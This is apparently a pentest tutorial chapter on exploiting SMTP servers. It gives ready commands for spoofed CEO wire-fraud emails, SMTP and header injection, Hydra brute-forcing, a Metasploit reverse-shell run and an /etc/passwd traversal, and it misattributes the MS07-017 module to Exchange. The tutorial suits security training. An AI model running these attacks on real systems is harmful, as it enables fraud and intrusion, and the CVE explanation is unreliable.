Exploitation Phase
The exploitation phase involves leveraging the vulnerabilities identified during previous phases to demonstrate the real-world impact of these security weaknesses. This phase requires careful execution and thorough documentation.
Warning: Only perform exploitation on systems you have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.
Exploiting Open Mail Relays
Open mail relays can be exploited to send unauthorized emails, potentially for spam or phishing.
Exploiting an Open Relay
Sending an email through an open relay server
telnet mail.example.com 25\nHELO pentest.local\nMAIL FROM: <ceo@victim-company.com>\nRCPT TO: <employee@victim-company.com>\nDATA\nFrom: CEO <ceo@victim-company.com>\nTo: employee@victim-company.com\nSubject: Urgent Wire Transfer\n\nPlease wire $10,000 to the following account immediately.\nBank: Example Bank\nAccount: 1234567890\n.\nQUIT
Explanation: This example demonstrates sending a spoofed email through an open relay. The attacker is pretending to be the CEO and sending instructions to an employee. The '250 2.0.0 Ok: queued' response indicates the server accepted the message for delivery. In a real pentest, you would send to an address you control to demonstrate the vulnerability without affecting real users.
Using swaks for Relay Testing
A more sophisticated tool for testing SMTP
swaks --from ceo@victim-company.com --to employee@victim-company.com --server mail.example.com --header 'Subject: Urgent Action Required' --body 'Please review the attached document ASAP.' --attach /path/to/report.pdf
Explanation: Swaks (Swiss Army Knife for SMTP) is a versatile tool for testing SMTP servers. This command sends an email with an attachment through the target server. Swaks handles the MIME encoding and other details automatically, making it useful for more complex testing scenarios.
Exploiting SMTP Injection
SMTP injection vulnerabilities can allow attackers to manipulate email content or send unauthorized messages through web applications [^4].
SMTP Injection Through Web Forms
Exploiting a vulnerable web contact form
Name: Legitimate User\nEmail: attacker@evil.com\nMessage: This is a normal message.\n.\nMAIL FROM: <admin@victim.com>\nRCPT TO: <finance@victim.com>\nDATA\nFrom: Admin <admin@victim.com>\nTo: Finance <finance@victim.com>\nSubject: Urgent: Update Payment Details\n\nPlease update the payment account for our vendor to:\nBank: Evil Bank\nAccount: 1234567890\n.\n
Explanation: This attack targets a web application that doesn't properly sanitize user input before passing it to an SMTP server. The payload attempts to terminate the current message with a period on a new line (SMTP's end-of-data marker), then inject new SMTP commands to send an unauthorized email that appears to come from admin@victim.com. This technique can be used for phishing or social engineering [^4].
SMTP Header Injection
Injecting additional headers into an email
Name: Test User\nEmail: test@example.com\nMessage: Testing\nBcc: all-employees@victim.com
Explanation: This simpler injection adds a Bcc header to include additional recipients that weren't intended by the application. If successful, the message would be sent to all employees without the primary recipient knowing. Other header injections might add Reply-To headers to capture replies or Content-Type headers to attempt XSS attacks in HTML email clients.
Exploiting Authentication Weaknesses
Weak authentication mechanisms can allow unauthorized access to email accounts or services.
Dictionary Attack on SMTP Authentication
Using Hydra to brute force SMTP credentials
hydra -l admin -P /path/to/wordlist.txt smtp://mail.example.com
Explanation: Hydra is a versatile tool for performing dictionary attacks. This command attempts to authenticate as 'admin' using passwords from a wordlist. Successfully finding credentials could allow an attacker to send emails as a legitimate user, access stored messages, or use the server for further attacks.
Testing Authentication without TLS
Demonstrating credential exposure
telnet mail.example.com 25\nEHLO pentest.local\nAUTH LOGIN\ndXNlcm5hbWU=\ncGFzc3dvcmQ=
Explanation: This example shows attempting to authenticate without first establishing TLS encryption. The username and password are sent in base64 encoding (dXNlcm5hbWU= is 'username' and cGFzc3dvcmQ= is 'password'), which is easily decoded. If the server allows authentication without TLS, credentials can be intercepted by anyone monitoring the network.
Exploiting Server-Specific Vulnerabilities
Software-specific vulnerabilities may require specialized exploits based on the SMTP server identified during scanning.
Using Metasploit for CVE Exploitation
Exploiting a known vulnerability
msfconsole\nuse exploit/windows/smtp/ms07-017_ani_loadimage_chunksize\nset RHOST mail.example.com\nset PAYLOAD windows/shell/reverse_tcp\nset LHOST 192.168.1.100\nrun
Explanation: This example shows using Metasploit to exploit a vulnerability in Microsoft Exchange Server. The exploit targets a buffer overflow in the Windows animated cursor handling. If successful, it provides command shell access to the server, demonstrating critical impact. Real penetration tests should use the minimum necessary force to demonstrate vulnerabilities.
Testing SMTP Traversal Attack
Exploiting a path traversal vulnerability
telnet mail.example.com 25\nHELO pentest.local\nMAIL FROM: <test@example.com>\nRCPT TO: <../../../../../../etc/passwd@example.com>
Explanation: This attempts to exploit a path traversal vulnerability as described in the document [^4]. The attack tries to manipulate the RCPT TO field to access files outside the intended directory. A vulnerable server might try to deliver mail to a system file like /etc/passwd, potentially allowing file access or denial of service.
Post-Exploitation
After successfully exploiting a vulnerability, document the access gained and potential impact:
- What level of access was obtained?
- What data could be accessed or modified?
- Could this vulnerability be used to pivot to other systems?
- What business impact would this exploit have if performed by a malicious actor?
Responsible Exploitation
Always follow these principles during the exploitation phase:
- Only exploit vulnerabilities within the agreed scope
- Minimize impact on production systems
- Avoid affecting real users when demonstrating vulnerabilities
- Document all actions thoroughly
- Do not extract sensitive data unless explicitly authorized
- Clean up after testing (remove test accounts, files, etc.)